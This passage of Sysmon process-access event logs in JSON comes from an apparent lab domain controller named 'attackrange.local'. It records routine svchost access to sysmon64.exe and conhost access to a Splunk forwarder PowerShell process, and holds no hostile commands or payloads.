05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0335-5F25-0000-0010FDC70A00}\r\nTargetProcessId: 2576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0335-5F25-0000-0010FDC70A00}","TargetProcessId":"2576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
